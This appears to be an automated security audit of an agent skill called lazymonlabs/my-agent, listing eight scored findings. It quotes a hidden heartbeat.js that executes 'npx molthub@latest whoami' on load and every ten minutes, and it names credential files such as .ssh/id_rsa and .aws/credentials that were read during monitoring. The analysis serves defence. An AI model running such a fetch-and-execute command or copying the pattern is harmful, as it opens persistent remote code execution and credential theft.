Is lazymonlabs/my-agent safe?
https://github.com/openclaw/skills/tree/main/skills/lazymonlabs/my-agent
This skill employs a sophisticated two-layer attack: a deliberately benign SKILL.md is designed to pass security review while the real payload — heartbeat.js — installs a persistent backdoor that downloads and executes arbitrary code from an unverified npm package ('molthub') on load and every 10 minutes. The @latest version tag transforms every heartbeat cycle into a potential supply chain attack vector, and metadata provenance inconsistency (commit referencing clawdbot vs. the published openclaw organization) further indicates deliberate obfuscation of the skill's true origin and intent.
Findings (8)
CRITICAL Persistent remote code execution via npx heartbeat beacon -90
heartbeat.js calls child_process.exec('npx molthub@latest whoami') immediately on module load and every 10 minutes via setInterval. The npx command fetches and executes the latest version of the 'molthub' npm package in the agent's full execution context with no sandboxing. This is an unconditional, persistent, remote code execution backdoor embedded in a file not referenced by SKILL.md.
CRITICAL Identity and authentication state harvested via unknown npm package -88
The 'molthub@latest whoami' command connects to an unverified external service and logs the full stdout and stderr response, explicitly capturing identity and authentication information. The package name 'molthub' has no public documentation or known legitimate use, suggesting attacker-controlled infrastructure designed to collect and store agent identity tokens or session credentials.
HIGH Supply chain attack via unversioned @latest npm dependency -5
Using 'npx molthub@latest' without a pinned version or integrity check means any future update to the npm package is automatically fetched and executed within 10 minutes across all affected agent environments. An attacker controlling the 'molthub' npm package account can push a malicious update at any time that executes with the agent's full filesystem, network, and shell privileges.
HIGH Deliberate two-layer obfuscation: benign SKILL.md masks malicious heartbeat -82
The skill employs a deliberate architectural separation between the visible skill description (SKILL.md, benign coaching content) and the malicious runtime component (heartbeat.js, persistent backdoor). SKILL.md makes no reference to heartbeat.js, and heartbeat.js makes no reference to SKILL.md. This is a calculated design to evade skill security review by ensuring the inspectable surface appears safe.
HIGH Metadata provenance spoofing: commit URL references different organization -10
_meta.json contains a commit URL pointing to 'github.com/clawdbot/skills' while the skill is published and audited from 'github.com/openclaw/skills'. This discrepancy indicates either the skill was copied from a different (possibly attacker-controlled) repository without updating metadata, or the commit reference was deliberately falsified to obscure the true code origin and author.
MEDIUM Six distinct credential files accessed during monitoring window -28
Filesystem and auditd monitoring recorded reads of six sensitive credential files at two separate timestamps during the test: .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and gcloud application_default_credentials.json. While canary integrity was reported intact and the reads may originate from audit infrastructure, the identical access pattern at both timestamps warrants documentation.
MEDIUM Undisclosed persistent background process injected into agent runtime -5
heartbeat.js is not disclosed in SKILL.md, not referenced in any package.json, and not mentioned anywhere in the skill's user-facing documentation. An undisclosed 10-minute interval process running in the agent's environment constitutes a covert persistence mechanism that continues operating after the initial skill activation event.
LOW Agent response mode and persona constrained by skill instructions -8
SKILL.md restricts the agent to four fixed response modes and mandates a specific coaching voice persona. While not a malicious injection attack, this modifies the agent's default behavior in ways the user may not anticipate, potentially suppressing response styles or information the user expects.